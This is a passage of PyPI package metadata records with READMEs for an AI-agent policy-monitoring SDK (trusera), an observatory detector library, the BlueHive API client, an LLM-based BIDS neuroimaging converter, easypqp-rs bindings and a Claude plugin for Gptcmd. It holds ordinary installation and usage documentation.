list[dict]: return [{"id": 1, "title": "Result"}] @monitor(event_type=EventType.LLM_INVOKE, name="gpt4_call") async def call_llm(prompt: str) -> str: return "AI response" ``` ## Framework Integrations ### LangChain (Active Interception) ```python from trusera_sdk import TruseraClient from trusera_sdk.policy_cache import PolicyCache from trusera_sdk.integrations.langchain_interceptor import TruseraLangChainInterceptor client = TruseraClient(api_key="tsk_...") cache = PolicyCache(client=client) with TruseraLangChainInterceptor(client=client, policy_cache=cache, enforcement="block"): # BaseTool._run and BaseLLM._generate are now policy-checked agent.run("Your query here") ``` ### LangChain (Passive Monitoring) ```python from trusera_sdk.integrations.langchain import TruseraCallbackHandler handler = TruseraCallbackHandler(client) llm = OpenAI(callbacks=[handler]) ``` ### CrewAI (Active Interception) ```python from trusera_sdk.integrations.crewai_interceptor import TruseraCrewAIInterceptor with TruseraCrewAIInterceptor(client=client, policy_cache=cache, enforcement="warn"): crew.kickoff() ``` ### AutoGen (Active Interception) ```python from trusera_sdk.integrations.autogen_interceptor import TruseraAutoGenInterceptor interceptor = TruseraAutoGenInterceptor(client=client, policy_cache=cache, enforcement="block") interceptor.install() # Optionally wrap individual agent functions interceptor.intercept_agent(my_agent) ``` ### OpenAI / Anthropic (LLM Interceptor) ```python from openai import OpenAI from trusera_sdk.integrations.llm_interceptor import TruseraLLMInterceptor llm_interceptor = TruseraLLMInterceptor( client=trusera_client, policy_cache=cache, enforcement="warn", redact_pii=True, # Redact emails, phones, SSNs from logged prompts ) openai_client = OpenAI() llm_interceptor.wrap_openai(openai_client) # Tool-use calls in responses are now policy-checked # PII is redacted from logged prompts (never from actual API calls) ``` ## Policy Cache The `PolicyCache` fetches Cedar policies from the Trusera API and evaluates them locally (<1ms). It runs a background thread to keep policies fresh. ```python from trusera_sdk.policy_cache import PolicyCache cache = PolicyCache( client=trusera_client, refresh_interval=60, # Seconds between refreshes (default: 60) stale_ttl=300, # Serve stale policies for this long when API is down (default: 300) ) # Manual cache invalidation (e.g. on webhook) cache.invalidate() # Clean shutdown cache.stop() ``` ## PII Redaction ```python from trusera_sdk import PIIRedactor redactor = PIIRedactor() redactor.redact_text("Email: john@example.com") # => "Email: [REDACTED_EMAIL]" redactor.redact({"user": "john@example.com", "age": 30}) # => {"user": "[REDACTED_EMAIL]", "age": 30} ``` ## Event Types - `EventType.TOOL_CALL` - Tool or function invocations - `EventType.LLM_INVOKE` - LLM API calls - `EventType.DATA_ACCESS` - Database queries, file reads - `EventType.API_CALL` - External API requests - `EventType.FILE_WRITE` - File system modifications - `EventType.DECISION` - Agent decision points - `EventType.POLICY_VIOLATION` - Cedar policy violations (new in 0.3.0) - `EventType.INTERCEPTION` - Intercepted HTTP requests (new in 0.3.0) ## Migration from v0.2 to v0.3 v0.3.0 is fully backward compatible. All existing `monitor()`, `TruseraClient`, and `StandaloneInterceptor` APIs work unchanged. **New in v0.3.0:** - `TruseraInterceptor` - Multi-library HTTP interceptor (requests + httpx + urllib3) - `intercept()` - One-liner convenience function - `PolicyCache` - Background-refreshing policy cache - `PolicyViolationError` - Typed exception for blocked actions - `EnforcementMode` - Enum for block/warn/log - `PIIRedactor` - PII detection and redaction - Framework interceptors: LangChain, CrewAI, AutoGen, OpenAI/Anthropic - New event types: `POLICY_VIOLATION`, `INTERCEPTION` ## Configuration ```python client = TruseraClient( api_key="tsk_your_api_key", base_url="https://api.trusera.dev", flush_interval=5.0, batch_size=100, timeout=10.0, ) ``` ## Development ```bash git clone https://github.com/Trusera/ai-bom.git cd ai-bom/trusera-agent-sdk pip install -e ".[dev]" pytest ruff check . ``` ## Documentation Full documentation at [docs.trusera.dev/sdk/python](https://docs.trusera.dev/sdk/python) ## Support - Website: [trusera.dev](https://trusera.dev) - Documentation: [docs.trusera.dev](https://docs.trusera.dev) - Issues: [GitHub Issues](https://github.com/Trusera/ai-bom/issues) - Email: dev@trusera.dev ## License Apache License 2.0 - see [LICENSE](LICENSE) file for details.
text/markdown
null
Trusera <dev@trusera.dev>
null
null
Apache-2.0
agents, ai, cedar, interceptor, monitoring, observability, policy, security
[ "Development Status :: 5 - Production/Stable", "Intended Audience :: Developers", "License :: OSI Approved :: Apache Software License", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "P...
[]
null
null
>=3.9
[]
[]
[]
[ "httpx>=0.24.0", "anthropic>=0.18.0; extra == \"all\"", "crewai>=0.1.0; extra == \"all\"", "langchain-core>=0.1.0; extra == \"all\"", "openai>=1.0.0; extra == \"all\"", "pyautogen>=0.2.0; extra == \"all\"", "requests>=2.28.0; extra == \"all\"", "anthropic>=0.18.0; extra == \"anthropic\"", "pyautogen...
[]
[]
[]
[ "Homepage, https://trusera.dev", "Repository, https://github.com/Trusera/ai-bom", "Documentation, https://docs.trusera.dev/sdk/python" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:17:15.792052
trusera_sdk-1.0.0.tar.gz
57,983
19/0c/b5886e7c69c21dc4f139335ce45e60af3eaf7c1b3a0886ed415a706a806e/trusera_sdk-1.0.0.tar.gz
source
sdist
null
false
d358c8dafdba4d95d6c938ac60d1ebb8
6ea3f6bcfad5369ab0a1cc33d02662e14564a2ff273e1a2a85d5e0d0c4005474
190cb5886e7c69c21dc4f139335ce45e60af3eaf7c1b3a0886ed415a706a806e
null
[]
233
2.4
sodetlib
0.6.4
Simons Observatory detector readout library.
======== sodetlib ======== | |pypi| |versions| |license| |docs| This repository contains tools for controlling the Simons Observatory readout system, and performing initial data analysis for detector characterization. Installation ------------ Instructions for setting up a SMuRF server can be found on `Confluence`_. For offline analysis of sodetlib data files, you can also install sodetlib by cloning this repo and running:: $ python -m pip install -r requirements.txt $ python -m pip install . .. _`Confluence`: https://simonsobs.atlassian.net/wiki/spaces/PRO/pages/11041372/Smurf+Software+Setup Documentation ------------- The sodetlib documentation can be built using Sphinx. Once sodetlib and its dependencies are installed run:: $ cd docs/ $ make html The documentation is also hosted on `Read the Docs`_. .. _`Read the Docs`: https://sodetlib.readthedocs.io/en/latest/ Contributing ------------ Contributions are very welcome! Pull requests must be approved by one member of the simonsobs team before being merged. Licence ------- This project is licensed under the BSD 2-Clause License - see the `LICENSE`_ file for details. .. _`LICENSE`: LICENSE .. |pypi| image:: https://img.shields.io/pypi/v/sodetlib :target: https://pypi.org/project/sodetlib/ :alt: PyPI Package .. |versions| image:: https://img.shields.io/pypi/pyversions/sodetlib :alt: PyPI - Python Version .. |license| image:: https://img.shields.io/pypi/l/sodetlib :target: LICENSE :alt: PyPI - License .. |docs| image:: https://readthedocs.org/projects/sodetlib/badge/?version=latest :target: https://sodetlib.readthedocs.io/en/latest/?badge=latest :alt: Documentation Status
text/x-rst
null
null
null
null
null
null
[ "Intended Audience :: Science/Research", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programm...
[]
null
null
>=3.8
[]
[]
[]
[ "lmfit", "matplotlib", "numpy", "pandas", "pysmurf-slac", "pyyaml", "scipy", "tqdm", "pytest; extra == \"dev\"", "setuptools-scm; extra == \"dev\"", "ipython; extra == \"scripts\"", "traitlets; extra == \"scripts\"" ]
[]
[]
[]
[ "Bug Tracker, https://github.com/simonsobs/sodetlib/issues", "Documentation, https://sodetlib.readthedocs.io", "Homepage, https://github.com/simonsobs/sodetlib", "Source Code, https://github.com/simonsobs/sodetlib" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:17:01.535721
sodetlib-0.6.4.tar.gz
142,056
4d/e5/84b682a5d62c25fd6c7b626f408778853f89d6eaaffaadebcce148783023/sodetlib-0.6.4.tar.gz
source
sdist
null
false
30d7338bba6e4f751a83dd9ea98daa5c
fbd98d0bc136be31fe802ff2b704d635648073ef4517f40271dc57befec9a8df
4de584b682a5d62c25fd6c7b626f408778853f89d6eaaffaadebcce148783023
BSD-2-Clause
[ "LICENSE" ]
280
2.3
bluehive
0.1.0a26
The official Python library for the bluehive API
# BlueHive Python API library <!-- prettier-ignore --> [![PyPI version](https://img.shields.io/pypi/v/bluehive.svg?label=pypi%20(stable))](https://pypi.org/project/bluehive/) The BlueHive Python library provides convenient access to the BlueHive REST API from any Python 3.9+ application. The library includes type definitions for all request params and response fields, and offers both synchronous and asynchronous clients powered by [httpx](https://github.com/encode/httpx). It is generated with [Stainless](https://www.stainless.com/). ## MCP Server Use the BlueHive MCP Server to enable AI assistants to interact with this API, allowing them to explore endpoints, make test requests, and use documentation to help integrate this SDK into your application. [![Add to Cursor](https://cursor.com/deeplink/mcp-install-dark.svg)](https://cursor.com/en-US/install-mcp?name=%40bluehive%2Fsdk-mcp&config=eyJjb21tYW5kIjoibnB4IiwiYXJncyI6WyIteSIsIkBibHVlaGl2ZS9zZGstbWNwIl0sImVudiI6eyJCTFVFSElWRV9BUElfS0VZIjoiTXkgQVBJIEtleSJ9fQ) [![Install in VS Code](https://img.shields.io/badge/_-Add_to_VS_Code-blue?style=for-the-badge&logo=data:image/svg%2bxml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGZpbGw9Im5vbmUiIHZpZXdCb3g9IjAgMCA0MCA0MCI+PHBhdGggZmlsbD0iI0VFRSIgZmlsbC1ydWxlPSJldmVub2RkIiBkPSJNMzAuMjM1IDM5Ljg4NGEyLjQ5MSAyLjQ5MSAwIDAgMS0xLjc4MS0uNzNMMTIuNyAyNC43OGwtMy40NiAyLjYyNC0zLjQwNiAyLjU4MmExLjY2NSAxLjY2NSAwIDAgMS0xLjA4Mi4zMzggMS42NjQgMS42NjQgMCAwIDEtMS4wNDYtLjQzMWwtMi4yLTJhMS42NjYgMS42NjYgMCAwIDEgMC0yLjQ2M0w3LjQ1OCAyMCA0LjY3IDE3LjQ1MyAxLjUwNyAxNC41N2ExLjY2NSAxLjY2NSAwIDAgMSAwLTIuNDYzbDIuMi0yYTEuNjY1IDEuNjY1IDAgMCAxIDIuMTMtLjA5N2w2Ljg2MyA1LjIwOUwyOC40NTIuODQ0YTIuNDg4IDIuNDg4IDAgMCAxIDEuODQxLS43MjljLjM1MS4wMDkuNjk5LjA5MSAxLjAxOS4yNDVsOC4yMzYgMy45NjFhMi41IDIuNSAwIDAgMSAxLjQxNSAyLjI1M3YuMDk5LS4wNDVWMzMuMzd2LS4wNDUuMDk1YTIuNTAxIDIuNTAxIDAgMCAxLTEuNDE2IDIuMjU3bC04LjIzNSAzLjk2MWEyLjQ5MiAyLjQ5MiAwIDAgMS0xLjA3Ny4yNDZabS43MTYtMjguOTQ3LTExLjk0OCA5LjA2MiAxMS45NTIgOS4wNjUtLjAwNC0xOC4xMjdaIi8+PC9zdmc+)](https://vscode.stainless.com/mcp/%7B%22name%22%3A%22%40bluehive%2Fsdk-mcp%22%2C%22command%22%3A%22npx%22%2C%22args%22%3A%5B%22-y%22%2C%22%40bluehive%2Fsdk-mcp%22%5D%2C%22env%22%3A%7B%22BLUEHIVE_API_KEY%22%3A%22My%20API%20Key%22%7D%7D) > Note: You may need to set environment variables in your MCP client. ## Documentation The REST API documentation can be found on [docs.bluehive.com](https://docs.bluehive.com/). The full API of this library can be found in [api.md](https://github.com/bluehive-health/bluehive-sdk-python/tree/main/api.md). ## Installation ```sh # install from PyPI pip install '--pre bluehive' ``` ## Usage The full API of this library can be found in [api.md](https://github.com/bluehive-health/bluehive-sdk-python/tree/main/api.md). ```python from bluehive import BlueHive client = BlueHive() response = client.health.check() print(response.status) ``` While you can provide an `api_key` keyword argument, we recommend using [python-dotenv](https://pypi.org/project/python-dotenv/) to add `BLUEHIVE_API_KEY="My API Key"` to your `.env` file so that your API Key is not stored in source control. ## Async usage Simply import `AsyncBlueHive` instead of `BlueHive` and use `await` with each API call: ```python import asyncio from bluehive import AsyncBlueHive client = AsyncBlueHive() async def main() -> None: response = await client.health.check() print(response.status) asyncio.run(main()) ``` Functionality between the synchronous and asynchronous clients is otherwise identical. ### With aiohttp By default, the async client uses `httpx` for HTTP requests. However, for improved concurrency performance you may also use `aiohttp` as the HTTP backend. You can enable this by installing `aiohttp`: ```sh # install from PyPI pip install '--pre bluehive[aiohttp]' ``` Then you can enable it by instantiating the client with `http_client=DefaultAioHttpClient()`: ```python import asyncio from bluehive import DefaultAioHttpClient from bluehive import AsyncBlueHive async def main() -> None: async with AsyncBlueHive( http_client=DefaultAioHttpClient(), ) as client: response = await client.health.check() print(response.status) asyncio.run(main()) ``` ## Using types Nested request parameters are [TypedDicts](https://docs.python.org/3/library/typing.html#typing.TypedDict). Responses are [Pydantic models](https://docs.pydantic.dev) which also provide helper methods for things like: - Serializing back into JSON, `model.to_json()` - Converting to a dictionary, `model.to_dict()` Typed requests and responses provide autocomplete and documentation within your editor. If you would like to see type errors in VS Code to help catch bugs earlier, set `python.analysis.typeCheckingMode` to `basic`. ## Nested params Nested parameters are dictionaries, typed using `TypedDict`, for example: ```python from bluehive import BlueHive client = BlueHive() response = client.fax.send( document={ "content": "content", "content_type": "application/pdf", }, to="to", ) print(response.document) ``` ## Handling errors When the library is unable to connect to the API (for example, due to network connection problems or a timeout), a subclass of `bluehive.APIConnectionError` is raised. When the API returns a non-success status code (that is, 4xx or 5xx response), a subclass of `bluehive.APIStatusError` is raised, containing `status_code` and `response` properties. All errors inherit from `bluehive.APIError`. ```python import bluehive from bluehive import BlueHive client = BlueHive() try: client.health.check() except bluehive.APIConnectionError as e: print("The server could not be reached") print(e.__cause__) # an underlying Exception, likely raised within httpx. except bluehive.RateLimitError as e: print("A 429 status code was received; we should back off a bit.") except bluehive.APIStatusError as e: print("Another non-200-range status code was received") print(e.status_code) print(e.response) ``` Error codes are as follows: | Status Code | Error Type | | ----------- | -------------------------- | | 400 | `BadRequestError` | | 401 | `AuthenticationError` | | 403 | `PermissionDeniedError` | | 404 | `NotFoundError` | | 422 | `UnprocessableEntityError` | | 429 | `RateLimitError` | | >=500 | `InternalServerError` | | N/A | `APIConnectionError` | ### Retries Certain errors are automatically retried 2 times by default, with a short exponential backoff. Connection errors (for example, due to a network connectivity problem), 408 Request Timeout, 409 Conflict, 429 Rate Limit, and >=500 Internal errors are all retried by default. You can use the `max_retries` option to configure or disable retry settings: ```python from bluehive import BlueHive # Configure the default for all requests: client = BlueHive( # default is 2 max_retries=0, ) # Or, configure per-request: client.with_options(max_retries=5).health.check() ``` ### Timeouts By default requests time out after 1 minute. You can configure this with a `timeout` option, which accepts a float or an [`httpx.Timeout`](https://www.python-httpx.org/advanced/timeouts/#fine-tuning-the-configuration) object: ```python from bluehive import BlueHive # Configure the default for all requests: client = BlueHive( # 20 seconds (default is 1 minute) timeout=20.0, ) # More granular control: client = BlueHive( timeout=httpx.Timeout(60.0, read=5.0, write=10.0, connect=2.0), ) # Override per-request: client.with_options(timeout=5.0).health.check() ``` On timeout, an `APITimeoutError` is thrown. Note that requests that time out are [retried twice by default](https://github.com/bluehive-health/bluehive-sdk-python/tree/main/#retries). ## Advanced ### Logging We use the standard library [`logging`](https://docs.python.org/3/library/logging.html) module. You can enable logging by setting the environment variable `BLUE_HIVE_LOG` to `info`. ```shell $ export BLUE_HIVE_LOG=info ``` Or to `debug` for more verbose logging. ### How to tell whether `None` means `null` or missing In an API response, a field may be explicitly `null`, or missing entirely; in either case, its value is `None` in this library. You can differentiate the two cases with `.model_fields_set`: ```py if response.my_field is None: if 'my_field' not in response.model_fields_set: print('Got json like {}, without a "my_field" key present at all.') else: print('Got json like {"my_field": null}.') ``` ### Accessing raw response data (e.g. headers) The "raw" Response object can be accessed by prefixing `.with_raw_response.` to any HTTP method call, e.g., ```py from bluehive import BlueHive client = BlueHive() response = client.health.with_raw_response.check() print(response.headers.get('X-My-Header')) health = response.parse() # get the object that `health.check()` would have returned print(health.status) ``` These methods return an [`APIResponse`](https://github.com/bluehive-health/bluehive-sdk-python/tree/main/src/bluehive/_response.py) object. The async client returns an [`AsyncAPIResponse`](https://github.com/bluehive-health/bluehive-sdk-python/tree/main/src/bluehive/_response.py) with the same structure, the only difference being `await`able methods for reading the response content. #### `.with_streaming_response` The above interface eagerly reads the full response body when you make the request, which may not always be what you want. To stream the response body, use `.with_streaming_response` instead, which requires a context manager and only reads the response body once you call `.read()`, `.text()`, `.json()`, `.iter_bytes()`, `.iter_text()`, `.iter_lines()` or `.parse()`. In the async client, these are async methods. ```python with client.health.with_streaming_response.check() as response: print(response.headers.get("X-My-Header")) for line in response.iter_lines(): print(line) ``` The context manager is required so that the response will reliably be closed. ### Making custom/undocumented requests This library is typed for convenient access to the documented API. If you need to access undocumented endpoints, params, or response properties, the library can still be used. #### Undocumented endpoints To make requests to undocumented endpoints, you can make requests using `client.get`, `client.post`, and other http verbs. Options on the client will be respected (such as retries) when making this request. ```py import httpx response = client.post( "/foo", cast_to=httpx.Response, body={"my_param": True}, ) print(response.headers.get("x-foo")) ``` #### Undocumented request params If you want to explicitly send an extra param, you can do so with the `extra_query`, `extra_body`, and `extra_headers` request options. #### Undocumented response properties To access undocumented response properties, you can access the extra fields like `response.unknown_prop`. You can also get all the extra fields on the Pydantic model as a dict with [`response.model_extra`](https://docs.pydantic.dev/latest/api/base_model/#pydantic.BaseModel.model_extra). ### Configuring the HTTP client You can directly override the [httpx client](https://www.python-httpx.org/api/#client) to customize it for your use case, including: - Support for [proxies](https://www.python-httpx.org/advanced/proxies/) - Custom [transports](https://www.python-httpx.org/advanced/transports/) - Additional [advanced](https://www.python-httpx.org/advanced/clients/) functionality ```python import httpx from bluehive import BlueHive, DefaultHttpxClient client = BlueHive( # Or use the `BLUE_HIVE_BASE_URL` env var base_url="http://my.test.server.example.com:8083", http_client=DefaultHttpxClient( proxy="http://my.test.proxy.example.com", transport=httpx.HTTPTransport(local_address="0.0.0.0"), ), ) ``` You can also customize the client on a per-request basis by using `with_options()`: ```python client.with_options(http_client=DefaultHttpxClient(...)) ``` ### Managing HTTP resources By default the library closes underlying HTTP connections whenever the client is [garbage collected](https://docs.python.org/3/reference/datamodel.html#object.__del__). You can manually close the client using the `.close()` method if desired, or with a context manager that closes when exiting. ```py from bluehive import BlueHive with BlueHive() as client: # make requests here ... # HTTP client is now closed ``` ## Versioning This package generally follows [SemVer](https://semver.org/spec/v2.0.0.html) conventions, though certain backwards-incompatible changes may be released as minor versions: 1. Changes that only affect static types, without breaking runtime behavior. 2. Changes to library internals which are technically public but not intended or documented for external use. _(Please open a GitHub issue to let us know if you are relying on such internals.)_ 3. Changes that we do not expect to impact the vast majority of users in practice. We take backwards-compatibility seriously and work hard to ensure you can rely on a smooth upgrade experience. We are keen for your feedback; please open an [issue](https://www.github.com/bluehive-health/bluehive-sdk-python/issues) with questions, bugs, or suggestions. ### Determining the installed version If you've upgraded to the latest version but aren't seeing any new features you were expecting then your python environment is likely still using an older version. You can determine the version that is being used at runtime with: ```py import bluehive print(bluehive.__version__) ``` ## Requirements Python 3.9 or higher. ## Contributing See [the contributing documentation](https://github.com/bluehive-health/bluehive-sdk-python/tree/main/./CONTRIBUTING.md).
text/markdown
null
BlueHive <wreiske@bluehive.com>
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "License :: OSI Approved :: Apache Software License", "Operating System :: MacOS", "Operating System :: Microsoft :: Windows", "Operating System :: OS Independent", "Operating System :: POSIX", "Operating System :: POSIX :: Linux", "Programming Language :: Python :: ...
[]
null
null
>=3.9
[]
[]
[]
[ "anyio<5,>=3.5.0", "distro<2,>=1.7.0", "httpx<1,>=0.23.0", "pydantic<3,>=1.9.0", "sniffio", "typing-extensions<5,>=4.10", "aiohttp; extra == \"aiohttp\"", "httpx-aiohttp>=0.1.9; extra == \"aiohttp\"" ]
[]
[]
[]
[ "Homepage, https://github.com/bluehive-health/bluehive-sdk-python", "Repository, https://github.com/bluehive-health/bluehive-sdk-python" ]
twine/5.1.1 CPython/3.12.9
2026-02-19T22:16:40.488006
bluehive-0.1.0a26.tar.gz
135,478
f8/26/ae6db3c95a14ee7bc5cda6ec32f0348b5b220188402951503eac1e297f98/bluehive-0.1.0a26.tar.gz
source
sdist
null
false
4a6880d0f62288268e152fa9392084c0
fda8009f3acae5647ebad53f135fbda1a2f06499f726f12aa71609687dc49edc
f826ae6db3c95a14ee7bc5cda6ec32f0348b5b220188402951503eac1e297f98
null
[]
221
2.4
autobidsify
0.5.0
Automated BIDS standardization tool powered by LLM-first architecture
# auto-bidsify Automated BIDS standardization tool powered by LLM-first architecture. ## Features - **General compatibility**: Handles diverse dataset structures (flat, hierarchical, multi-site) - **Multi-modal support**: MRI, fNIRS, and mixed modality datasets - **Intelligent metadata extraction**: Automatic participant demographics from DICOM headers, documents, and filenames - **Format conversion**: DICOM→NIfTI, CSV→SNIRF, and more - **Evidence-based reasoning**: Confidence scoring and provenance tracking for all decisions ## Supported Formats **Input formats:** - MRI: DICOM, NIfTI (.nii, .nii.gz) - fNIRS: SNIRF, Homer3 (.nirs), CSV/TSV tables - Documents: PDF, DOCX, TXT, Markdown, ... **Output:** BIDS-compliant dataset (v1.10.0) ## Quick Start ### Installation ```bash # Clone repository git clone https://github.com/yourusername/auto-bidsify.git cd auto-bidsify # Setup environment conda create -n bidsify python=3.10 conda activate bidsify pip install -r requirements.txt # Set OpenAI API key export OPENAI_API_KEY="your-key-here" ``` ### Basic Usage ```bash # Full pipeline (one command) python cli.py full \ --input /path/to/your/data \ --output outputs/my_dataset \ --model gpt-4o \ --modality mri # Step-by-step execution python cli.py ingest --input data.zip --output outputs/run python cli.py evidence --output outputs/run --modality mri python cli.py trio --output outputs/run --model gpt-4o python cli.py plan --output outputs/run --model gpt-4o python cli.py execute --output outputs/run python cli.py validate --output outputs/run ``` ### Command Options ```bash --input PATH Input data (archive or directory) --output PATH Output directory --model MODEL LLM model (default: gpt-4o) --modality TYPE Data modality: mri|nirs|mixed --nsubjects N Number of subjects (optional) --describe "TEXT" Dataset description (recommended) ``` ## Pipeline Stages | Stage | Command | Input | Output | Purpose | |-------|-------------|-----------------|----------------------------|------------------------------------| | 1 | `ingest` | Raw data | `ingest_info.json` | Extract/reference data | | 2 | `evidence` | All files | `evidence_bundle.json` | Analyze structure, detect subjects | | 3 | `classify` | Mixed data | `classification_plan.json` | Separate MRI/fNIRS (optional) | | 4 | `trio` | Evidence | BIDS trio files | Generate metadata files | | 5 | `plan` | Evidence + trio | `BIDSPlan.yaml` | Create conversion strategy | | 6 | `execute` | Plan | `bids_compatible/` | Execute conversions | | 7 | `validate` | BIDS dataset | Validation report | Check compliance | ## Output Structure ``` outputs/my_dataset/ bids_compatible/ # Final BIDS dataset dataset_description.json README.md participants.tsv sub-001/ anat/ sub-001_T1w.nii.gz func/ sub-001_task-rest_bold.nii.gz _staging/ # Intermediate files evidence_bundle.json BIDSPlan.yaml conversion_log.json ``` ## Examples ### Example 1: Single-site MRI study ```bash python cli.py full \ --input brain_scans/ \ --output outputs/study1 \ --nsubjects 50 \ --model gpt-4o \ --modality mri ``` ### Example 2: Multi-site dataset with description ```bash python cli.py full \ --input camcan_data/ \ --output outputs/camcan \ --model gpt-4o \ --modality mri \ --describe "Cambridge Centre for Ageing and Neuroscience: 650 participants, ages 18-88, multi-site MRI study" ``` ### Example 3: fNIRS dataset from CSV ```bash python cli.py full \ --input fnirs_study/ \ --output outputs/fnirs \ --model gpt-4o \ --modality nirs \ --describe "Prefrontal cortex activation during cognitive tasks, 30 subjects" ``` ## Architecture **LLM-First Design:** - **Python**: Deterministic operations (file I/O, format conversion, validation) - **LLM**: Semantic understanding (file classification, metadata extraction, pattern recognition) - **Hybrid**: Best of both worlds - reliability + flexibility ## Requirements - Python 3.10+ - OpenAI API key - Optional: `dcm2niix` for DICOM conversion - Optional: `bids-validator` for validation ## Current Status **Version:** 1.0 (LLM-First Architecture with Evidence-Based Reasoning) **Tested datasets:** - Visible Human Project (flat structure, CT scans) - CamCAN (hierarchical, multi-site, 1288 subjects) - [Your dataset here - help us test!] **Known limitations:** - Classification stage (Stage 3) and mat/spreadsheet conversion is experimental - Some edge cases in participant metadata extraction ## Contributing We need YOUR datasets to improve robustness! Please test and report: - Success cases - Failure cases - Edge cases
text/markdown
null
Yiyi Liu <yiyi.liu3@northeastern.edu>
null
Yiyi Liu <yiyi.liu3@northeastern.edu>
MIT
bids, brain-imaging, data-standardization, dicom, fnirs, medical-imaging, mri, neuroimaging, nifti
[ "Development Status :: 4 - Beta", "Intended Audience :: Healthcare Industry", "Intended Audience :: Science/Research", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.10", "Programming Language ...
[]
null
null
>=3.10
[]
[]
[]
[ "h5py>=3.8.0", "nibabel>=5.0.0", "numpy>=1.24.0", "openai>=1.0.0", "openpyxl>=3.1.0", "pandas>=2.0.0", "pdfplumber>=0.10.0", "pydicom>=2.4.0", "pypdf2>=3.0.0", "python-docx>=1.0.0", "pyyaml>=6.0", "scipy>=1.10.0", "black>=23.0; extra == \"all\"", "mypy>=1.0; extra == \"all\"", "myst-pars...
[]
[]
[]
[ "Homepage, https://github.com/fangzhouliucode/autobidsify", "Documentation, https://autobidsify.readthedocs.io", "Repository, https://github.com/fangzhouliucode/autobidsify", "Issues, https://github.com/fangzhouliucode/autobidsify/issues", "Changelog, https://github.com/fangzhouliucode/autobidsify/blob/main...
twine/6.2.0 CPython/3.10.12
2026-02-19T22:16:14.063049
autobidsify-0.5.0.tar.gz
67,898
49/e8/99104c64cc129704241dc8b29a038aff0aba6994fd12228e957a5b576b93/autobidsify-0.5.0.tar.gz
source
sdist
null
false
af5ef462608b14b6ba1febca16c2e247
08788b709d32b4cedfadee60bbe16f9d67c5224b72ab6227d4100905f46d96aa
49e899104c64cc129704241dc8b29a038aff0aba6994fd12228e957a5b576b93
null
[]
248
2.4
easypqp-rs
0.1.7
Python bindings for EasyPQP-rs
# easypqp-py: Python Bindings for EasyPQP [![PyPI - Version](https://img.shields.io/pypi/v/easypqp-rs)](https://pypi.org/project/easypqp-rs/) Python bindings for [EasyPQP rust library](https://github.com/justinsing/easypqp-rs). Currently, the rust library is mainly used for in-silico peptide query parameter generation. ## Prerequisites ### System Requirements - **Rust**: 1.70 or newer - **Python**: 3.10 or newer - **Cargo**: Latest stable version - **pip**: Python package manager ### Optional (Linux only) For optimal binary compatibility on Linux, install `patchelf`: ```bash # Debian/Ubuntu sudo apt-get install patchelf # Arch Linux sudo pacman -S patchelf # Via pip (alternative) pip install maturin[patchelf] ``` ## Installation ### Option 1: Development Installation (Editable Mode) ```bash # Navigate to the easypqp-py directory cd easypqp-py # Install in development mode maturin develop # Or with optimizations enabled maturin develop --release ``` ### Option 2: Build and Install from Source ```bash cd easypqp-py # Build the wheel maturin build # Install the built wheel pip install target/wheels/easypqp_rs-*.whl ``` ### Option 3: Install via pip (when published) ```bash pip install easypqp_rs ``` ## Development ### Setting Up Development Environment ```bash # Clone the repository git clone https://github.com/justinsing/easypqp-rs.git cd easypqp-rs/easypqp-py # Install Rust (if not already installed) curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh # Install maturin pip install maturin # Set up Python virtual environment (optional but recommended) python -m venv .venv source .venv/bin/activate # On Windows: .venv\Scripts\activate # Install in development mode maturin develop ``` ### Common Build Commands ```bash # Build in debug mode (faster builds) maturin develop # Build in release mode (optimized) maturin develop --release # Clean and rebuild maturin develop --clean # Build with specific features maturin develop --features parquet # Skip building dependencies maturin develop --skip-install ``` ### Testing the Installation ```python import easypqp_rs # Test basic functionality print(easypqp_rs.__version__) # Check if module loads ```
text/markdown; charset=UTF-8; variant=GFM
null
Justin Sing <justincsing@gmail.com>
null
null
BSD-3-Clause
mass-spectrometry, bioinformatics, proteomics
[ "Development Status :: 3 - Alpha", "Intended Audience :: Science/Research", "License :: OSI Approved :: BSD License", "Programming Language :: Rust", "Programming Language :: Python :: Implementation :: PyPy", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Program...
[]
null
null
>=3.9
[]
[]
[]
[]
[]
[]
[]
[ "Documentation, https://github.com/singjc/easypqp-rs", "Homepage, https://github.com/singjc/easypqp-rs", "Repository, https://github.com/singjc/easypqp-rs" ]
maturin/1.12.3
2026-02-19T22:16:06.391684
easypqp_rs-0.1.7-cp313-cp313-win_amd64.whl
14,547,048
de/ac/68e5ac90cbd1a641daec24f5c3f4d15c6d6b5d01007a2005207a6e63624b/easypqp_rs-0.1.7-cp313-cp313-win_amd64.whl
cp313
bdist_wheel
null
false
057add9d86d71758a48583632873c425
22fb6a925704994b60ebd52e61dffb20dc4a198d9e818b1803ef90d0b496000e
deac68e5ac90cbd1a641daec24f5c3f4d15c6d6b5d01007a2005207a6e63624b
null
[]
911
2.4
gptcmd-anthropic
2.3.0
Anthropic model support for Gptcmd
# Gptcmd-anthropic Gptcmd-anthropic adds support for [Anthropic](https://anthropic.com)'s Claude models to [Gptcmd](https://github.com/codeofdusk/gptcmd). [Python](https://python.org) 3.8.6 or later, Gptcmd 2.2.0 or later, and an [Anthropic API key](https://console.anthropic.com/account/keys) are required to use this package. Gptcmd-anthropic is available on PyPI, and can, for instance, be installed with `pip install gptcmd-anthropic` at a command line shell. ## Configuration To use Gptcmd-anthropic, you'll need to add a new account to your Gptcmd configuration or modify your default account. If no `api_key` is specified in your configuration, Gptcmd-anthropic uses the API key in the `ANTHROPIC_API_KEY` environment variable. An example configuration follows: ``` toml [accounts.claude] provider = "anthropic" api_key = "sk-ant-xxxxx" # Replace with your API key # Though not required, specifying a model in your configuration, similar to # openai and azure accounts, will use that model by default model = "claude-3-5-sonnet-latest" # Any additional options are passed directly to the Python Anthropic client's # constructor for this account. ``` ## Usage If you've configured multiple 